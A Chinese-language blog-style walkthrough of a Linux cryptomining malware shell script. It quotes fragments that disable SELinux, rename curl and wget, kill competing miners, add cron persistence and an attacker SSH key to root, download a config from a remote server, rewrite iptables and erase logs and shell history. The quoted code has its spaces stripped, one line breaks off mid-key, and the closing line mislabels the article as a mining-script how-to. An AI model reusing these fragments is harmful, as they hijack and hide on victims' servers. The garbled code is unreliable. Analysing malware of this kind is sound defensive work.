01.Code 1

#!/bin/sh

脚本的第一行,看起来是一行注释,但其实并不是。它规定了接下来的脚本,将要采用哪一个 SHELL 执行。

像我们平常用的 bash、zsh 等,属于 sh 的超集,这个脚本使用 sh 作为执行的 shell,具有更好的可移植性。

02.Code 2

setenforce02>dev/nullechoSELINUX=disabled>/etc/sysconfig/selinux2>/dev/null

setenforce 是 Linux 的 selinux 防火墙配置命令,执行 setenforce 0 表示关闭 selinux 防火墙。2 代表的是标准错误(stderr)的意思。

所以后面,使用重定向符,将命令的错误输出定向到 /dev/null 设备中。这个设备是一个虚拟设备,意思是什么都不干。非常适合静悄悄的干坏事。

03.Code 3

sync&&echo3>/proc/sys/vm/drop_caches

脚本贴心的帮我们释放了一些内存资源,以便获取更多的资源进行挖矿。

众所周知,Linux 系统会随着长时间的运行,会产生很多缓存,清理方式就是写一个数字到 drop_caches 文件里,这个数字通常为 3。

sync 命令将所有未写的系统缓冲区写到磁盘中,执行之后就可以放心的释放缓存了。

04.Code 4

crondir='/var/spool/cron/'"$USER"cont=`cat${crondir}`ssht=`cat/root/.ssh/authorized_keys`echo1>/etc/sysupdatesrtdir="/etc/sysupdates"bbdir="/usr/bin/curl"bbdira="/usr/bin/cur"ccdir="/usr/bin/wget"ccdira="/usr/bin/wge"mv/usr/bin/wget/usr/bin/getmv/usr/bin/xget/usr/bin/getmv/usr/bin/get/usr/bin/wgemv/usr/bin/curl/usr/bin/urlmv/usr/bin/xurl/usr/bin/urlmv/usr/bin/url/usr/bin/cur

没错,上面这些语句就是完成了一些普通的操作。值得注意的是,它把我们的一些常用命令,使用 mv 命令给重名了。

这在执行命令的时候,就会显得分成功能的蛋疼。这脚本已经更改了计算机的一些文件,属于犯罪的范畴了。

脚本为了复用一些功能,抽象出了很多的函数。我们直接跳到 main 函数的执行,然后看一下这个过程。

05.Code 5

首先是 kill_miner_proc 函数。代码很长,就不全部贴出来了。

kill_miner_proc(){psauxf|grep-vgrep|grep"mine.moneropool.com"|awk'{print$2}'|xargskill-9...pkill-fbiosetjenkinspkill-fLoopback...crontab-rrm-rf/var/spool/cron/*

挖矿领域是一个相爱相杀的领域。这个方法首先使用 ps、grep、kill 一套组合,干掉了同行的挖矿脚本,然后停掉了同行的 cron 脚本,黑吃黑的感觉。

在这段脚本里,使用了 pkill 命令。这个命令会终止进程,并按终端号踢出用户,比较暴力。

06.Code 6

接下来执行的是 kill_sus_proc 函数。

psaxf-o"pid"|whilereadprociddo...done

ps 加上 o 参数,可以指定要输出的列,在这里只输出的进程的 pid,然后使用 read 函数,对 procid 进行遍历操作。

07.Code 7

ls-l/proc/$procid/exe|grep/tmpif[$?-ne1]then...fi

上面就是遍历操作过程了,我们可以看到 if 语句的语法。其中 $? 指的是上一个命令的退出状态。

0 表示没有错误,其他任何值表明有错误。-ne 是不等于的意思,意思就是能够匹配到 tmp 这个字符串。

08.Code 8

psaxf-o"pid%cpu"|awk'{if($2>=40.0)print$1}'|whilereadprociddo...done

呵呵,上面又来了一次循环遍历。不过这次针对的目标,是 CPU 使用超过 40% 的进程。这就有点狠了:影响我挖矿的进程,都得死!相煎何太急。

09.Code 9

再接下来,脚本针对不同的用户属性,进行了不同的操作。

首先是 root 用户。通过判断是否存在 $rtdir 文件,来确定是否是 root 权限。

chattr-i/etc/sysupdate*chattr-i/etc/config.json*chattr-i/etc/update.sh*chattr-i/root/.ssh/authorized_keys*chattr-i/etc/networkservice

使用 chattr 命令,把一些重要的文件,搞成不能任意改动的只读属性,也是够损的。然后,操作 cron 程序,把脚本的更新服务加入到定时中。

就是下面这段脚本。

10.Code 10

if[!-f"/usr/bin/crontab"]thenecho"*/30****sh/etc/update.sh>/dev/null2>&1">>${crondir}else[[$cont=~"update.sh"]]||(crontab-l;echo"*/30****sh/etc/update.sh>/dev/null2>&1")|crontab-fi

注意 [[ $cont =~ "update.sh" ]] 这以小段代码,怪异的很。[[ ]] 是 shell 中内置的一个命令,支持字符串的模式匹配。

使用 =~ 的时候,甚至支持 shell 的正则表达式,强大的令人发指。它的输出结果是一个 bool 类型,所以能够使用||进行拼接。

而后面的单小括号 (),是的是一个命令组,括号中多个命令之间用分号隔开,最后一个命令可以没有分号;和 `cmd` 的效果基本是一样的。

11.Code 11

搞完了定时任务,就要配置 ssh 自动登录了,通过把公钥追加到信任列表中就可以。

chmod700/root/.ssh/echo>>/root/.ssh/authorized_keyschmod600root/.ssh/authorized_keysecho"ssh-rsaAAAAB3NzaC1yc2EAAAADAQABAAABAQC9WKiJ7yQ6HcafmwzDMv1RKxPdJI/

12.Code 12

说曹操曹操就到,下面的脚本就使用了 `` 进行操作。

filesize_config=`ls-l/etc/config.json|awk'{print$5}'`if["$filesize_config"-ne"$config_size"]thenpkill-fsysupdaterm/etc/config.jsondownloads$config_url/etc/config.json$config_url_backupelseecho"noneeddownload"fi

通过一系列骚操作,获取到配置文件的大小,如果判断文件大小不一致,那么就重新下载一个。这就用到了 downloads 函数。

shell 中的函数,看起来比较怪异,后面的参数传递,就像是脚本传递一样,传送给函数。

13.Code 13

downloads$config_url/etc/config.json$config_url_backup

这句话,就传递了三个参数。当然,文件要从遥远的服务器上下载。域名是 .de 结尾的,证明是个德国的域名,其他的我们一无所知。

downloads(){if[-f"/usr/bin/curl"]thenecho$1,$2http_code=`curl-I-m10-o/dev/null-s-w%{http_code}$1`if["$http_code"-eq"200"]thencurl--connect-timeout10--retry100$1>$2elif["$http_code"-eq"405"]thencurl--connect-timeout10--retry100$1>$2elsecurl--connect-timeout10--retry100$3>$2fielif[-f"/usr/bin/cur"]thenhttp_code=`cur-I-m10-o/dev/null-s-w%{http_code}$1`if["$http_code"-eq"200"]thencur--connect-timeout10--retry100$1>$2elif["$http_code"-eq"405"]thencur--connect-timeout10--retry100$1>$2elsecur--connect-timeout10--retry100$3>$2fielif[-f"/usr/bin/wget"]thenwget--timeout=10--tries=100-O$2$1if[$?-ne0]thenwget--timeout=10--tries=100-O$2$3fielif[-f"/usr/bin/wge"]thenwge--timeout=10--tries=100-O$2$1if[$?-eq0]thenwge--timeout=10--tries=100-O$2$3fifi}

我认为,这段代码作者写的又臭又长,完全没有体现出自己应有的水平。应该是赶工期,没有想好代码的复用,才会写的这么有失水准。

我们上面说到,脚本改了几个命令的名字,其中就有 curl。这个命令是如此的强大,以至于脚本的作者都忍不住加了不少参数:

• -I:用来测试 http 头信息。

• -m:设置最大传输时间。

• -o:指定保持的文件名。这里是 /dev/null,呃呃呃......

• -s:静默模式,不输出任何东西。

• --connect-timeout:连接超时时间。

• --retry:重试次数,好狠,100 次。

如果没有 curl?那就使用替补的 wget,套路都是一样的。

14.Code 14

接下来是一系列相似的操作,最后,对 iptables 一批操作。

iptables-Fiptables-Xiptables-AOUTPUT-ptcp--dport3333-jDROPiptables-AOUTPUT-ptcp--dport5555-jDROPiptables-AOUTPUT-ptcp--dport7777-jDROPiptables-AOUTPUT-ptcp--dport9999-jDROPiptables-IINPUT-s43.245.222.57-jDROPserviceiptablesreload

15.Code 15

细心的脚本编写者,还使用命令清理了操作日志。

history-cecho>/var/spool/mail/rootecho>/var/log/wtmpecho>/var/log/secureecho>/root/.bash_history

“数据库的挖矿脚本怎么写”的内容就介绍到这里了,感谢大家的阅读。如果想了解更多行业相关的知识可以关注本站网站,小编将为大家输出更多高质量的实用文章!